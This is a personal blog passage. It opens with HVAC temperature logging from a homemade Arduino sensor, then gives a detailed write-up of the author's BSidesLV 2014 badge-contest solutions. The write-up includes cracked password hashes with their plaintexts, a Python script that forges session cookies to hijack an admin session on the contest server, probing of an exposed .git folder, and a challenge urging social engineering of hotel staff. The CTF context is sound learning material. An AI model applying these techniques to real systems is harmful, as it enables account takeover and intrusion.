Finally, about 2:30 on Wednesday I switched the fan back to “constantly on” and saw the temperature rise again, but then it stabilized somewhat lower than the curve I discerned before. Perhaps the constant flow kept the air in the ductwork from warming up exponentially (like in a greenhouse) but heat was still being transferred even to the moving air.

I ended the experimenting about 4:00, when I switched the fan off completely, and the register temperature dropped back to match that of the other sensors in the room (which was pretty close to the outside temperature as well).

In fact, there’s a pretty strong correlation (well, visually, anyway…I’m not enough of a data geek to quantify that correlation) between the outside temperature and that of the air coming through the register. So again, there’s something happening here, either heating in the attic, or some halo effect near the window / ceiling location of the sensor, or maybe a little of both.

Then yesterday I tried something different.

Fan Details

Here, the red and blue lines are the sensors on the table (actually in adjacent holes on a breadboard, so it’s interesting to see the blue sensor lagging the red one), the orange is the output (register) temperature, and the green is the cold air return (about 5 feet above the table). What’s really important is the relationship between the vent and the other three (which kind of give a general ambient room temperature). (these are the default colors my RRD setup uses, not the custom setup I used when I hand-crafted the first graph from logged data).

We know that our A/C will be down for a while, so we elected to just wait until the scheduled leak test in a couple weeks…partially as an experiment in A/C-free living (which our kids don’t appreciate quite as much, BTW). So we put a window fan in the bedroom, right below the A/C register I keep referring to. Overnight, it’s set to pull cooler air in from outside. During the day, it blows air out, on the theory that it’ll pull cooler air from the basement and 1st floor, which has an HVAC system that’s still working. I don’t remember when I switched direction on the fan, but it was probably between 7:30 and 8:00.

Shortly afterwards, the register temperature climbs steadily, which isn’t surprising given the past data and the fact that this window gets full sun in the morning. Then, just to verify the previous days’ data, I turned the furnace fan to continuous on at about 1:30. The temperature at the register dropped over 5 degrees, but still remained significantly higher than the temperature in the room. I turned it back off, and the line climbed back up to resume the earlier slope. Then I had a crazy idea: What if the window fan was sucking air out of the register? I turned it off, and the temperature plummeted, back to an unsteady 2-3 degrees above the room temperature. Turning the furnace fan back on again resumed the high temperature readings from that register, higher than before, but still consistent with the rising temperatures outside (not shown on this graph). When it was finally turned off, with the window turned off, the temperature fell to match the rest of the sensors in the room.

With the window fan and furnace fans both turned off, today’s graph has been four very similar lines, all within about 3 degrees of yesterday’s values at the same time. Certainly, the weather today may be different from that of yesterday or the day before (it got quite cool Tuesday night due to some rains in the area), but I’m hoping that the system will show that the room temperature is a little more stable (and hopefully lower) now that I’m not sucking hot air out of the attic ductwork.

I’m also more than a little concerned about my preliminary conclusion, that the attic adds 5 or more degrees to the air as it passes through the system. If the coil is really expected to drop air temperature by 10-15 degrees, then I’m losing a full 33% efficiency just by exposure to the attic air (and these systems are so efficient to begin with). There’s a roof-mounted ventilation fan, which should be pulling some hot air out of the attic, and monitoring that (and the attic temperature in general) is on my list for this project.

But I feel like the ductwork shouldn’t be absorbing that much heat to begin with. I don’t know if it’s a function of the air return, or the air distribution, or the furnace unit itself, but it really does seem like I may need to do some work up there. Right now, it’s a rat’s nest of flexible ductwork, leading from the furnace to smaller distribution boxes to further flexible ducts, etc. All of them are running at 4-6’ above the attic floor, with long swoops and droops. I seriously wonder whether ripping that all out and installing rigid ducts, at the floor joist level and covered with heaps of blown-in insulation, might make a significant difference here.

It’s also possible that the heat increase isn’t coming from the attic at all, but from the much larger cold air return in the hallway by the kids’ rooms. I’ll need to get another sensor over there to see if that’s the case, but generally, the master bedroom (where all these other sensors are located) feels a lot warmer than the hall, so I’m still leaning towards the attic ductwork being a problem.

Either way, this is an amazing amount of information, and may already be helping me better understand and diagnose our long-running HVAC problems, all from only a couple days’ worth of logging and an Arduino-based sensor that took less than a day to cobble together (ignoring delays from a failed WiFi breakout board). I can’t wait until I have both my HVAC systems fully instrumented, with real local outdoor and attic temperatures as well.

Yay, data!

BSidesLV 2014 Badge Contest

BSidesLV 2014 Badge

I was in Las Vegas for another Security Summer Camp, and for the past 5 years a major part of that has been Security BSides, or BSidesLV. I checked in and only barely got a badge, as they had just run out (but while I was standing there looking sad, someone stepped up with an extra…crisis averted!)

It didn’t take long for me to notice a faint QR code on the back of the badge, but I didn’t bother to read where it led at this point. I hung out for a while, watched an interesting talk on PRNGs, and went back to my room at Black Hat to unwind after a long travel day.

The next morning, I looked at the contest and thought it should be fun. It generally followed a popular Jeopardy structure often seen in Capture the Flag (CTF) games, with five categories of challenges:

Each category had five challenges, worth 10, 20, 30, 40, and 50 points. The first person to solve each challenge earned a 25% bonus as well.

One interesting twist was that it worked like a bingo board: completing five challenges in a row (across, down, or diagonal) earns a significant bingo bonus — 150 points for the first to complete a particular bingo, 100 for subsequent matching bingo sets. But to make it a little harder, the challenges were mixed up such that any valid bingo needed one of each category.

Here’s what the board looked like at the beginning of the game:

Full BSidesLV Puzzle Board

Players needed to click on each square to reveal the challenge and point value (between 10 and 50 points). To earn credit for a challenge, the players simply emailed their handle, the challenge name, and their answer, and it would be manually reviewed and added to the system. The middle square (usually a “free space” in bingo) was worth ten points, and served as the entry point into the game.

I was able to solve 15 of the 25 challenges, in just under 16 hours (though for the last one, the judges ruled that I’d been given too many hints…more on that later, but it was a fair decision).

** SPOILERS BELOW ** If you’d like to try to solve some of these challenges on your own (mostly the Crypto and Password Cracking ones), go to this spoiler-free list of challenges.

Completed Challenges

Do It: CHALLENGE ACCEPTED! (10 points)

TimeFirst?Completed by
8:18 amNo 22 people
You've found this site, ergo you probably have a BSLV5 Badge. Send an e-mail to BSLV5@Urbane.sh with the subject "$yourhandle CHALLANGE ACCEPTED" to register.

Simply join the challenge. The overall game instructions said to include “Key: Legeneary” in the body of the email, so I did, just to be sure.

Misc: House Party (50 points)

TimeFirst?Completed by
8:21 amNo 5 people
Visit the first two BSides Houses and take a photo of you in front of them.

I didn’t go to the first BSides, but did make it to the second and remember it being a really great location. It took a little while to find the right addresses, but I drove by both and took a lousy selfie in front of each.

First House, BSidesLV 2009 Second House, BSidesLV 2010

Crack It: Easy Peasy (10 points)

TimeFirst?Completed by
9:00 amNo 19 people
MD5 7ea04a3b047bc6364839c2dd34eccbb7

I think I just googled for this one. Definitely lived up to its name — just an MD5 hash of the word “nightowl”.

Decipher It: Knock Three Times If You’re There (30 points)

TimeFirst?Completed by
9:01 amYes2 people

This was pretty clearly a Base-64 string. Decoding this gives…another Base-64 string. RWtWQ1JFSVZWRE0wTVJSRA== And another. EkVCREIVVDM0MRRD Then finally, the decoder produced a binary string. Looking at that in hex shows something kind of interesting — all the digits are between 1 and 5.

1245 4244 4215 5433 3431 1443

This, along with the challenge name, leads me to try a Knock Code:


Using the hex digits as row and column coordinates gives the answer for this challenge: “BURT REYNOLDS”.

Do It: $.02 (20 points)

TimeFirst?Completed by
9:14 amNo 2 people
Post an honest and detailed review online (of 1000 characters or more) of a talk you attended. Can be positive, neutral, or otherwise.

Fortunately, I had gone to a pretty interesting talk the day before, so I wrote up a quick little review and posted it. BSidesLV Mersenne Twister Talk

Crack It: LAme MAN…. (30 points)

TimeFirst?Completed by
10:01 amNo 9 people
LM F6853114CCD860A7823031F4926E4DEE

Another quick password cracking exercise. I found an online tool, pasted in the hash, and quickly got the answer: “KR!3GERB0TSF7W”

Decipher It: Not Quite, Julius (10 points)

TimeFirst?Completed by
10:08 amYes3 people
Clue: 0123456789....

I immediately recognized that this was basically a Vigenère cipher, and the clue gave is the key: ABCDEFGH… The result was: “GREENMANTLE”.

Decipher It: WOPR With Cheese (20 points)

TimeFirst?Completed by
10:40 amYes1 person
Something seems to be off with the WOPR today. 

WOPR Image

I stared at this picture for a while but couldn’t think what to do with it. The most likely course was that the image had been changed somehow, so I found the original image. But all the text seemed unchanged. At this point I was thinking there was a message hidden using steganography or something, and kind of stopped thinking about it for a while (I hate stego :)).

So, I moved on to the “Under the Door” challenge, and called the phone number in the image. It was the front desk at the Palm hotel, so I asked for Zack’s room, thinking I would get a recorded clue. Instead, I ended up talking to SecBarbie, who seemed surprised I had called. So I didn’t walk away completely empty handed, she suggested where I should look in the image.

Sure enough, on the bottom right edge of the “Time Remaining” box, was a section of line that appeared darker than the rest. Flipping back and forth between the original and new image, it became even more apparent. I zoomed in, hoping to see a message, but instead saw a series of oddly colored pixels.

Embedded message in WOPR image

Using an image editor, I found the RGB color values for each pixel, and treated those as ASCII values, which revealed the solution: “Flag=ASD5AS3587F8H9FRT8D5F2G3”.

Decipher It: Under The Door (40 points)

Completed: 10:51 am, 40 points + 10 point bonus for solving first, cumulative score 246 points

Completed by 1 person

TimeFirst?Completed by
10:51 amYes1 person
Discovered this hidden message under my door....

Under the door

I saw this, and it was very obviously an Enigma message. The trick is to find all the correct settings for the machine, and almost everything was easily available right here. Rotor starting point: 14-23-0 (or “O-X-A” depending on the tool you use). Stecker settings: AG, BT, CZ, etc. (on the right side of the note). All that’s remaining is the rotor order (frequently rotors I, II, and III, in that order) and ring settings (many tools default to AAA or 000).

Trying with the default rotors / rings didn’t work. But there’s something written behind the scribbled out lines on the left. The top says “3-1-2” but the bottom “15-24-1”. Trying those together didn’t work, but it seems pretty likely that 3-1-2 is the correct rotor order settings. So where are the ring settings?

As described earlier, I’d tried calling the phone number on the note, but that didn’t get me the ring settings. I stared at it for a little while longer, then realized — “RING” is written directly above the area code “702”. That’s probably the ring settings. duh.

Another problem with Engima in puzzles is that there are a lot of online tools and applets, but at least a few of them are slightly off in one way or another. Fortunately, I wrote my own some time ago, so testing many different settings is pretty trivial:

$ pbpaste | python trySetting.py  -p AG-BT-CZ-DP-EM-FW-IR-LX-NO-SU -s OXA -w 312 -r HAC

So the answer to this challenge was “ARE WE NOT DOING PHRASING ANYMORE ZF”.

Hack It: Our Bug Bounty Program (10 points)

TimeFirst?Completed by
11:39 amNo 5 people
Submit your best fake-bug discovery (i.e. information disclosure through copy/paste to other applications).

I really wasn’t sure how we were supposed to do this, so I replied with a real bug discovery notice, but also included a lame “Did you know that if you use a password manager you might accidentally paste your password into a group Skype chat?” kind of “disclosure.”

Apparently that wasn’t quite good enough, and as a copy/paste “bug” was used in the example, I was told to try again. I then submitted this:


There’s a horrible vulnerability in the hotel! You can open ANY room with this bug!

Take your hotel room key.

Go to any other room (for example, Sec Barbie’s room, which number i don’t know yet but I have minions trying to find it for me), and then using the card..

** shove it between the door and the door jamb.**

If you do it JUST RIGHT, in the right place, you can push the door latch over and open the door.

now you’re in the room. 

Scary, eh? You’d think they’d have fixed this by now. 

I got “C+ for effort” but was given credit for the challenge anyway. I guess I’m just not very good at creating fake bug reports.

Hack It: This Concludes Your Evaluation (30 points)

TimeFirst?Completed by
1:45 pmNo 4 people
Determine the successful password for http://bslv5.urbanesecurity.com/hackit2.html

This challenge presented the player with a simple web form: a single text field and a submit button. Enter the wrong value in the field, and the page just reloads. Enter the right value, and you get “Login Successful.” What’s the right value?

The submit form calls a “passcheck” function, but I can’t read the actual function because the script has been obfuscated. I tried some online de-obfuscating tools, it was still pretty hard to read. Someone suggested simply trying “eval” in a browser javascript console (which should have been obvious from the challenge name). Why worry about de-obfuscation tools when the browser will just do it for you?!? (well, there are some good reasons to not use the browser for this, but for a contest, I think it’s probably safe…)

javascript eval

That gave me the correct answer: “CyrilFiggis”.

Misc: Potent Potables (20 points)

TimeFirst?Completed by
2:01 pmYes2 people
Take a photo of you doing a shot with a BSidesLV staff member.

I sent a friend, co-worker, and BSides Goon off in search of a shot glass to complete this (obviously easy) task, and surprisingly, he couldn’t find one anywhere on the main conference floor. But as I was heading out of the building to go back to Mandalay Bay and afternoon talks at Black Hat, I was interrupted by Todd Kimball who asked me to taste a particular whiskey he had in a coffee cup. It wasn’t a shot glass, but it was booze, and he was a staff member.

Doing a shot

Amazingly, I was the first person to complete this challenge.

Hack It: You Can’t Ignore This (20 points)

TimeFirst?Completed by
3:56 pmNo 3 people
Determine the key hidden at http://bslv5.urbanesecurity.com/~urbanesec/. Note: everything in /~urbanesec/* is fair game.

I was tuck on this for a long time. The page simply shows “Find the key inside this file.”

First, I tried to figure out what the “ignore” in the title meant. I knew there was something obvious that I was missing, but I just couldn’t think of it (it was like deja vu — I could sense an obvoius use of ignore but just couldn’t pin it down…)

At one point Zack even told me “I’d work more on “You can’t ignore this”. That one is the easiest to git.” But I didn’t notice the hint.

Then sometime later, it hit me — git ignore. Duh. The key must be in there So I tried grabbing the .gitignore file, and sure enough, there was a single file listed. But the contents of that file didn’t help at all. I thought, I must need to descend into the .git folder — I should be able to find the index.php file there directly. But none of the standard folders seemed to exist, or at least, the webserver wasn’t serving them up to me. And also my cellular connection (in the talk I was sitting in at the time) wasn’t being very cooporerative, and half my page fetches weren’t even working anyway.

Eventually, I found my way to a window and got a stronger connection, but I still couldn’t get the answer. I asked @sibios if he had any suggestions, and he helped me re-focus — suggested I create a new git repository and look at what files are created by default. There’s a “config” file — that was the trick.

Git transcript

The answer to this stage, then, was, “BurtReynoldsIsOnThePHONE!” Which gave me another 20 points, and my first bingo! At least 100 points, probably 150, but at this stage I’m not positive whether the scoreboard is current or if anyone has caught up to me. So, just to be sure that I don’t get caught, I keep working on the Shortener challenge…

Hack It: Short Challenge (40 points)

TimeFirst?Completed by
6:18 pmNo 4 people
Discover the key at

This one took me a long time to figure out — most of the day, in fact. The site was a simple field, but when you entered a URL, it would return a special shortened URL. My initial thinking was that I was looking for a key in the cryptography sense, and had to figure out how the random bit at the end of the shortener was derived. Zack helped me out pretty early by reminding me that this was a “Hack” category, not “Crypto.”

I tried a bunch of things, thinking to break the system somehow: SQLi to dump something in the table PHP source code disclosures, etc. The tool verifies that the remote site entered was valid — possibly something there. Interestingly, when you tried to shorten itself, it seemed to crash.

I set up a simple python http server on a remote Linode instance, just to see what the script did — it’s simply sending a “GET” command for the URL entered. I thought “I should try checking the HTTP headers” but didn’t at that time.

So I set it aside, worked on other problems, went to some talks, etc., and then some Twitter exchanges with @sibios helped me to remember that I’d never actually looked at the http headers presented by the shortener script. So I went back to the remote host, set up netcat listening on port 8000, and asked the tool to shorten a fake URL on that site. This is what I saw:

Shortener Key

So the solution to this challenge, which gave my my second bingo of the day, was “This is a pretty sweet key”.

Decipher It: One More Time (50 points)

TimeFirst?Completed by
11:56 pmYes0 people (officially)

NOTE: Points not actually awarded. Had this counted for the record, would have added 50 points + 13 point bonus for solving first, with a final score of 734 points.

(A clue added later: "Remember that one time, with Ceasar, things got insane at the Ninja party?")

By now, I was pretty confident that I had done just about everything I could today, though I still really wanted to get the last crypto puzzle. But it was time to eat, so off I went to a great hacker buffet at The Wynn. While there, I returned the favor to @sibios and helped him complete Knock Three Times.

I didn’t get back to my room until 11:45, and I emailed Zack to say that I was going to give it one last try. I asked if he could give me any last hints without giving it away, and mentioned what I had tried so far.

I had decided early on that this was probably a one-time pad (OTP), but where to find the key? The later hint suggested Caesar, but I knew that for a 50-point puzzle this couldn’t be just Caesar. I tried many words and phrases, parts of the lyrics to the song “One More Time,” and just couldn’t make anything work.

At 5:30, while still trying to figure out the Shortener challenge, he told me “Here at Urbane Security, we love one time pads….almost as much as we like Caesar salads (no anchovies of course)”. It was at about this time that I noticed that “Urbane Security” had the same number of characters as the cipher text. But that alone didn’t work.

Maybe it was a two-step process, though that’s usually a lot harder on players because you don’t get any real feedback on the intermediate success. Still, a just doing a simple ROT-x after using the one-time pad doesn’t seem too outrageous, so I checked all the possible shifts and found nothing.

“Security BSides” also had the right number of letters, so I played with that for a while. I tried shifting each key then using it with the OTP, or using one for OTP and another for a keyed Caesar, or the same parts but in the other order, etc. Finally, I had simply given up in favor of food.

But now I was back in my room and had described some of all that (in greatly abbreviated form) to Zack.

On Wed, Aug 6, 2014 at 11:52 PM, Zack Fasel wrote:
> "also tried using urbanesecurity as the OTP and 
> then rotating the output through all 26 (25, 
> but whatever) shifts"


Ha! I must have been on the right track after all. I tried reviewing my steps, and was in the middle of responding with some examples of what I’d tried, when he sent another note:

try it with rot 3 and let me know if it starts with "ILL"

I saw the ROT-3 but not the other part… and, squinting at the screen, saw the answer.

The correct solution was “ILLGOFETCHARUG” (“I’ll go fetch a rug.”). Zack sent along this Sterling Archer video too, by way of explanation. Which confirms that I should definitely watch this show. (I somehow suspect a lot of the other answers came from this same source).

But hadn’t I tried exactly this before? Scrollback confirmed, I totally missed it, hours before:

Totally missed this

In the end, Zack felt that he’d given me too many hints (especially the last “look at ROT-3” suggestion), and that he wasn’t sure should give me credit for it. Which I can kind of understand. Having another box checked off would’ve been nice, but the fact is I completely missed it before, and quite possibly could have missed it again. Skimming the output, glancing at the start and end of each line, “ILLGOFE…” and “…HARUG” just don’t jump out. So it’s pretty easy to miss.

Challenges I didn’t complete

Do It: Pick 3 (40 points)

TimeFirst?Completed by
0 people
Submit a photo of signed evidence that you picked 3 Locks comprising of Easy (3 pin), Medium (5 pin), and hard (5 pin + 2 security pins) in 7 minutes or less in the lockpick area.

Crack It: Don’t Eat That! (50 points)

TimeFirst?Completed by
0 people
Crack this admin's password:01c1fe5112f563e030f6aba0f51be085

Zack provided me with the answer so I could share it here: “Trufflepig1986?”.

$ python
Python 2.7.5 (default, Mar  9 2014, 22:15:05) 
[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.0.68)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib, binascii
>>> hash = hashlib.new('md4', 'Trufflepig1986?'.encode('utf-16le')).digest()
>>> binascii.b2a_hex(hash)

Misc: Jack and Coke? (40 points)

TimeFirst?Completed by
1 person
Take a photo of yourself with a signature drink vessel at Jack Daniels signature Las Vegas drinking establishment.

Misc: Cannoonnballll! (10 points)

TimeFirst?Completed by
0 people
Take a video (must be a video) of you taking a cannonball jump into the pool.

Crack It: Such Admin, Very Weak (20 points)

TimeFirst?Completed by
0 people

I later spoke with Zack (after solving Babytown Frolics) and he told me he’d hoped that someone would get this with a decent wordlist and mutation engine. The password was “Summer14!” which, honestly, I’m a little disappointed JTR didn’t find for me. :(

The hash was a salted-SHA-512 hash, 5000 rounds:

Python 2.7.5 (default, Mar  9 2014, 22:15:05)
[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.0.68)] on darwin
Type "help", "copyright", "credits" or "license" for more information.

>>> from passlib.hash import sha512_crypt
>>> sha512_crypt.encrypt('Summer14!', salt='DwjR36pA', rounds=5000)


Hack It: Babytown Frolics (50 points)

TimeFirst?Completed by
2 people
Discover the key at

This challenge presented the user with a simple name and password form, and nothing else.

So many of the results in this contest included references to the TV show Archer, that I finally broke down and watched it. It’s a helluva show. About halfway through the first one, Archer breaks into a mainframe using the password “guest” and, amazed at how easy it is, exclaims “Babytown frolics!” I just about jumped off the couch, shouting “AHA!” After the show was done, I ran downstairs and figured this out in like 15 minutes (though I needed Zack to “prime the contest” as it were, and some time to build a functional script….)

Entering “guest” as both userid and password, the player is presented with a screen like this:

No Flag For You

If you click on the “latest user logs” you get a time-stamped list of logins. When I was working on this, the program had been reset, so I needed Zack to log in as admin once. At that point, the history looked like this:

Login History

Looking at the cookies for the page, I see a single session ID cookie:

$ echo 'MTQwNzkwMDUzMTMyTk9UVEhFS0VZ' | base64 -D

That’s “not the key”, as it clearly says, but it’s damned close. The first 10 digits of this cookie represents the UNIX timestamp for when the cookie was created (when the user logged in), then there’s a (seemingly random) 2-digit number, and then the string “NOTTHEKEY”.

So if I build a script like this:

import sys, time, calendar, base64, urllib2

target_date = sys.argv[1]

stamp = calendar.timegm(time.strptime(target_date, '%b %d %I:%M:%S %Y'))

for x in range(0,100):
    cookie_str = '%d%dNOTTHEKEY' % (stamp, x)
    cookie = base64.b64encode(cookie_str)

    opener = urllib2.build_opener()
    opener.addheaders.append(('Cookie', 'sid=%s' % cookie))
    url = ''
        resp = opener.open(url)
        print resp.read()
        print x

and call it like this:

python doit.py "Aug 13 03:06:42 2014"

(where the timestamp was the last time Admin logged in), then I get an output like this:

$ python doit.py "Aug 13 03:06:42 2014"
<head><title>Quite the application</title></head><body><h1>Welcome, my admin from another mother!</h1><br />
<h2>Your flag is: "I couldn't have done it without Morris Day and Jerome."</h2><br />
<a href="/log">See the latest user logs</a>
<a href="/logout">Logout</a>

On the fourth attempt, I was able to match the admin’s session cookie, reload the page with his permissions, and see the flag. Simple session hijacking and privilege escalation. Very nice.

Do It: Wheels on The Bus (30 points)

TimeFirst?Completed by
0 people
Start a sing along of "wheels on the bus", "99 bottles of beer on the wall", or even more creative (i.e. I am woman hear me roar) sing along on the bsides shuttle and video it!

Do It: ALL THE THINGS! (50 points)

TimeFirst?Completed by
0 people
Attend a talk in Common Ground, Breaking Ground,  Proving Ground, and and a PasswordCon Track and the After Party and get a photo with a speaker from each (after their talk in the talk room) and one of the party DJs (during the party)

Misc: Special Delivery (30 points)

TimeFirst?Completed by
1 person
Find out and submit @SecBarbie's room number at the Tuscany. Social Engineering of Hotel Staff is a possibility.

Crack It: NyanNyan! (40 points)

TimeFirst?Completed by
0 people
NTLM E6E813370ACB92129BDA449EE25E0FA4

After speaking with Zack, it seems this (and “Don’t Eat That!”) were both pretty difficult NTLM hashes. But since Passwords Con was running in the same space as BSides, he figured there’d be at least a couple people able to throw some real cracking gear against these hashes. Guess nobody tried. :(

As with the other two passwords I didn’t crack, Zach shared the answer with me so I could put it here: “$R4nd0m9!”.

$ python
Python 2.7.5 (default, Mar  9 2014, 22:15:05) 
[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.0.68)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib, binascii
>>> hash = hashlib.new('md4', '$R4nd0m9!'.encode('utf-16le')).digest()
>>> binascii.b2a_hex(hash).upper()

Overall Score

My final bingo scoreboard looked like this:

My Final BSidesLV Puzzle Board

All My Scores

TimeChallenge NameFirst?PointsCumulative
8:18 Challenge Accepted No 10 10
8:21 House Party No 50 60
9:00 Easy Peasy No 10 70
9:01 Knock Three Times If You’re There Yes 38 108
9:14 $0.02 No 20 128
10:01 LAme MAN… No 30 158
10:08 Not Quite, Julius Yes 13 171
10:40 WOPR with Chese Yes 25 196
10:51 Under the Door Yes 50 246
11:39 Our Bug Bounty Program No 10 256
1:45 This Concludes your Evaluation No 30 286
2:01 Potent Potables Yes 25 311
3:56 You Can’t Ignore This No 20 331
3:56 BINGO Yes 150 481
6:18 Short Challenge No 40 521
6:18 BINGO Yes 150 671
11:59 One More Tme (Yes) (63) (734)

And, yes, I won. Thanks so much to Urbane Security for sponsoring the contest, and to Zack Fasel for putting it together and running it. This was one of the best contests I’ve played in a while, and was not only challenging, but also exciting (and a bit stressful, worried that someone might snipe me with solutions at the last second and best me…) Though that also kind of added to the excitement.

Congratulations also to Sibios (248 points), Spiral Suitcase (228 points), R4V5 (196 points) and Shadghost (130 points), rounding out the top 5, of the 23 who played.